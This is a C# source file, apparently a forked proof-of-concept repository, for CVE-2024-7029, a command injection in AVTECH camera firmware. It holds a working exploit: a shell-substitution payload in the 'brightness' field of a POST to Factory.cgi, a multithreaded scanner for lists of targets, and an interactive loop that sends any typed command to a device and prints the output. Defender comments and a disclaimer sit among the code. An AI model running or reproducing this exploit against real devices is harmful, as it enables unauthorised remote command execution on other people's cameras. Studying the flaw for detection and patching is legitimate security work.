forked from ebrasha/CVE-2024-7029
Program.cs
using System;
using System.IO;
using System.Net.Http;
using System.Threading.Tasks;
using System.Collections.Generic;
using System.Threading;
namespace PocCVE20247029
{
class Program
{
// Request path appended, unchanged, to every target base URL by CheckVuln and Exploit.
// For defenders: POST requests to this path are the ones to look for in device,
// proxy or IDS logs when triaging CVE-2024-7029 activity.
private static readonly string path = "/cgi-bin/supervisor/Factory.cgi";
// One HttpClient shared by every request in the program. It is created with
// default settings: no timeout, handler or header is configured here.
private static readonly HttpClient client = new HttpClient();
/// <summary>
/// Entry point: shows the disclaimer, requires an explicit "y" answer, collects the
/// target settings (from arguments or interactively) and runs the matching mode.
/// </summary>
/// <param name="args">
/// Optional switches of the form <c>-u=</c> (single target URL), <c>-f=</c> (file of
/// target URLs) and <c>-t=</c> (thread count). Unknown arguments are ignored, and a
/// <c>-t=</c> value that does not parse as an integer leaves the default of 10.
/// </param>
static async Task Main(string[] args)
{
    DisplayDisclaimer();
    Console.Write("Do you agree with the disclaimer? (y/n): ");
    string consent = Console.ReadLine()?.ToLower();
    if (consent != "y")
    {
        // Anything other than y/Y (including end of input) stops the program here.
        Console.ForegroundColor = ConsoleColor.Red;
        Console.WriteLine("You must agree to the disclaimer to proceed.");
        Console.ResetColor();
        Console.ReadLine();
        return;
    }

    DisplayBanner();

    string targetUrl = null;
    string targetListPath = null;
    int workerCount = 10;

    if (args.Length > 0)
    {
        // Command-line mode: later switches of the same kind overwrite earlier ones.
        foreach (string option in args)
        {
            if (option.StartsWith("-u="))
            {
                targetUrl = option.Substring(3);
                continue;
            }

            if (option.StartsWith("-f="))
            {
                targetListPath = option.Substring(3);
                continue;
            }

            if (option.StartsWith("-t=") && int.TryParse(option.Substring(3), out int parsed))
            {
                workerCount = parsed;
            }
        }
    }
    else
    {
        // Interactive mode: the file path is only requested when no URL was typed.
        Console.Write("Please enter the target URL (leave empty to use a file): ");
        targetUrl = Console.ReadLine();
        if (string.IsNullOrEmpty(targetUrl))
        {
            Console.Write("Please enter the path to the file containing target URLs: ");
            targetListPath = Console.ReadLine();
        }

        Console.Write("Enter the number of threads to use (default is 10): ");
        string reply = Console.ReadLine();
        if (!string.IsNullOrEmpty(reply) && int.TryParse(reply, out int parsed))
        {
            workerCount = parsed;
        }
    }

    // A URL takes precedence over a file when both were supplied.
    if (!string.IsNullOrEmpty(targetUrl))
    {
        var single = new AvTechExploit(targetUrl, workerCount);
        await single.Scanner();
        // Scanner() only prints its verdict; the interactive loop below is
        // entered whatever that verdict was.
        await single.InteractiveShell();
        return;
    }

    if (!string.IsNullOrEmpty(targetListPath))
    {
        var batch = new AvTechExploit(null, targetListPath, workerCount);
        await batch.ScanFile();
        return;
    }

    Console.ForegroundColor = ConsoleColor.Red;
    Console.WriteLine("[-] No target URL or file was specified.");
    Console.ResetColor();
    ShowHelp();
}
/// <summary>
/// Writes the usage disclaimer to the console in yellow, then resets the colour
/// and emits one blank line.
/// </summary>
private static void DisplayDisclaimer()
{
    string[] disclaimerLines =
    {
        "============================================",
        " DISCLAIMER: ",
        " POC: Abdal CVE-2024-7029 by EbraSha",
        " This Proof of Concept (PoC) is for educational purposes only.",
        " Unauthorized use of this software on systems you do not own or",
        " have explicit permission to test is illegal and unethical.",
        " Users must comply with all applicable laws and regulations.",
        " The developer assumes no responsibility for misuse or damage.",
        "============================================",
    };

    Console.ForegroundColor = ConsoleColor.Yellow;
    foreach (string line in disclaimerLines)
    {
        Console.WriteLine(line);
    }

    Console.ResetColor();
    Console.WriteLine();
}
/// <summary>
/// Writes the tool banner (name, author contact lines and the CVE identifier) to the
/// console in white, then resets the colour and emits one blank line.
/// </summary>
private static void DisplayBanner()
{
    string[] bannerLines =
    {
        "============================================",
        " Abdal CVE-2024-7029 Ver 1.0 ",
        " PoC: Ebrahim Shafiei (EbraSha) ",
        " Telegram: https://t.me/ProfShafiei ",
        " Email: Prof.Shafiei@gmail.com ",
        " Vulnerability ID: CVE-2024-7029 ",
        "============================================",
    };

    Console.ForegroundColor = ConsoleColor.White;
    foreach (string line in bannerLines)
    {
        Console.WriteLine(line);
    }

    Console.ResetColor();
    Console.WriteLine();
}
/// <summary>
/// Prints the three supported command-line switches in blue and resets the colour.
/// </summary>
private static void ShowHelp()
{
    string[] usageLines =
    {
        "Usage:",
        " -u=<url> Target URL to exploit",
        " -f=<file> File containing target URLs",
        " -t=<threads> Number of threads for scanning (default 10)",
    };

    Console.ForegroundColor = ConsoleColor.Blue;
    foreach (string line in usageLines)
    {
        Console.WriteLine(line);
    }

    Console.ResetColor();
}
public class AvTechExploit
{
// Base URL used by Scanner, Exploit and InteractiveShell; the static request
// path is appended to it when a request is sent.
private readonly string target;
// Path of the text file that ScanFile reads, one target per line.
private readonly string targetFile;
// Initial count of the SemaphoreSlim in ScanFile, i.e. the cap on concurrent checks.
private readonly int threads;
/// <summary>
/// Creates an instance for single-target use.
/// </summary>
/// <param name="target">Base URL of the device to send requests to.</param>
/// <param name="threads">Concurrency value stored on the instance.</param>
public AvTechExploit(string target, int threads)
{
    (this.target, this.threads) = (target, threads);
}
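/// <summary>
/// Creates an instance for file-based scanning.
/// </summary>
/// <param name="target">Optional base URL; may be <c>null</c> when only a file is scanned.</param>
/// <param name="targetFile">Path of the text file holding one target per line.</param>
/// <param name="threads">Maximum number of checks ScanFile runs at the same time.</param>
public AvTechExploit(string target, string targetFile, int threads)
{
    // The original body dropped this parameter silently, leaving the field null
    // whatever the caller passed. Storing it keeps the constructor honest about
    // its signature; callers that pass null see no change.
    this.target = target;
    this.targetFile = targetFile;
    this.threads = threads;
}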
/// <summary>
/// Announces the check in cyan and then runs <c>CheckVuln</c> against the
/// instance's single target.
/// </summary>
public async Task Scanner()
{
    const string notice = "[*] Checking if the target is vulnerable";

    Console.ForegroundColor = ConsoleColor.Cyan;
    Console.WriteLine(notice);
    Console.ResetColor();

    await CheckVuln(target);
}
/// <summary>
/// Reads <c>targetFile</c> and runs <c>CheckVuln</c> once per line, using a
/// semaphore initialised with <c>threads</c> to bound how many checks run at once.
/// </summary>
/// <remarks>
/// Results are only printed by <c>CheckVuln</c>; nothing is returned or stored.
/// Errors raised outside the per-target checks are printed in red and swallowed.
/// </remarks>
public async Task ScanFile()
{
    try
    {
        // Each line is used as a target exactly as written: no trimming,
        // blank-line skipping or URL validation happens in this method.
        var targets = await File.ReadAllLinesAsync(targetFile);
        // NOTE(review): threads is not range-checked before it is used as the
        // semaphore's initial count.
        using var semaphore = new SemaphoreSlim(threads);
        var tasks = new List<Task>();
        // The loop variable shadows the instance field of the same name.
        foreach (var target in targets)
        {
            // Wait for a free slot before starting the next check.
            await semaphore.WaitAsync();
            tasks.Add(Task.Run(async () =>
            {
                await CheckVuln(target);
                // NOTE(review): Release is not in a finally block; the slot is
                // returned only because CheckVuln catches its own exceptions.
                semaphore.Release();
            }));
        }
        // Keep the semaphore alive until every started check has finished.
        await Task.WhenAll(tasks);
    }
    catch (Exception ex)
    {
        // Reached for failures outside the individual checks, for example when
        // the target file cannot be read.
        Console.ForegroundColor = ConsoleColor.Red;
        Console.WriteLine($"[-] Error scanning from file: {ex.Message}");
        Console.ResetColor();
    }
}
/// <summary>
/// Sends one probe request to <paramref name="target"/> and prints whether a fixed
/// marker string appears in the response body.
/// </summary>
/// <param name="target">Base URL of the device; the static request path is appended unchanged.</param>
/// <remarks>
/// Any exception (connection failure, invalid URL, and so on) is caught, printed in
/// red and not rethrown, so this method always completes normally.
/// </remarks>
private async Task CheckVuln(string target)
{
    try
    {
        // Probe body. The brightness field, which would normally hold a number,
        // carries a shell command substitution that echoes a fixed marker.
        // Detection signature for defenders: a POST to the Factory.cgi path with
        // action=white_led and a brightness value containing "$(".
        // Mitigation idea (not part of this tool): reject non-numeric brightness
        // values at a reverse proxy or WAF and keep the device off untrusted networks.
        var test = "action=white_led&brightness=$(echo%20GDHAiwhsHWhswHSKA 2>&1) #";
        var content = new StringContent(test, System.Text.Encoding.UTF8,
        "application/x-www-form-urlencoded");
        var response = await client.PostAsync(target + path, content);
        // The HTTP status code is not examined; only the body text is.
        var responseText = await response.Content.ReadAsStringAsync();
        // NOTE(review): the marker is sent verbatim in the request, so a response
        // that merely reflects the request body would also match here. Treat a
        // positive as "marker seen in response", to be confirmed separately.
        if (responseText.Contains("GDHAiwhsHWhswHSKA"))
        {
            Console.ForegroundColor = ConsoleColor.Green;
            Console.WriteLine($"[+] The target is vulnerable: {target}");
            Console.ResetColor();
        }
        else
        {
            Console.ForegroundColor = ConsoleColor.Yellow;
            Console.WriteLine($"[-] The target is not vulnerable: {target}");
            Console.ResetColor();
        }
    }
    catch (Exception ex)
    {
        // Network and URL errors end up here and are reported per target.
        Console.ForegroundColor = ConsoleColor.Red;
        Console.WriteLine($"[-] Error checking target {target}: {ex.Message}");
        Console.ResetColor();
    }
}
/// <summary>
/// Sends <paramref name="cmd"/> inside the <c>brightness</c> form field of a POST to
/// the instance's target and prints the whole response body.
/// </summary>
/// <param name="cmd">Text interpolated as-is into the request body; it is neither encoded nor validated here.</param>
/// <remarks>
/// Exceptions from the HTTP call are caught, printed in red and not rethrown.
/// </remarks>
public async Task Exploit(string cmd)
{
    // Same request shape as the probe in CheckVuln, so the same log signature
    // applies: POST to the Factory.cgi path, action=white_led, and a brightness
    // value containing "$(" where a number is expected.
    var data = $"action=white_led&brightness=$({cmd} 2>&1) #";
    var content = new StringContent(data, System.Text.Encoding.UTF8, "application/x-www-form-urlencoded");
    try
    {
        var response = await client.PostAsync(target + path, content);
        // The status code is not checked; whatever body comes back is printed.
        var responseText = await response.Content.ReadAsStringAsync();
        Console.ForegroundColor = ConsoleColor.Green;
        Console.WriteLine($"[+] Command output: {responseText}");
        Console.ResetColor();
    }
    catch (Exception ex)
    {
        Console.ForegroundColor = ConsoleColor.Red;
        Console.WriteLine($"[-] Error during exploitation: {ex.Message}");
        Console.ResetColor();
    }
}
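/// <summary>
/// Reads lines from standard input in a loop and passes each one to <c>Exploit</c>
/// until the operator types "exit" (any casing) or standard input ends.
/// </summary>
/// <remarks>
/// Every line other than "exit" results in one request to the target, including an
/// empty line.
/// </remarks>
public async Task InteractiveShell()
{
    Console.ForegroundColor = ConsoleColor.Cyan;
    Console.WriteLine("[*] Initiating interactive shell. Type 'exit' to quit.");
    Console.ResetColor();
    while (true)
    {
        Console.ForegroundColor = ConsoleColor.Yellow;
        Console.Write("Shell> ");
        Console.ResetColor();
        var cmd = Console.ReadLine();

        // Console.ReadLine returns null when input ends (closed pipe, Ctrl+Z/Ctrl+D).
        // The original dereferenced it and crashed; end the session instead.
        if (cmd is null)
        {
            break;
        }

        // Compare ordinally so that quitting does not depend on the current
        // culture. With ToLower() under a Turkish culture "EXIT" lowers to a
        // dotless i, fails to match, and would be sent to the device instead of
        // ending the loop.
        if (string.Equals(cmd, "exit", StringComparison.OrdinalIgnoreCase))
        {
            break;
        }

        await Exploit(cmd);
    }
}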
}
}
}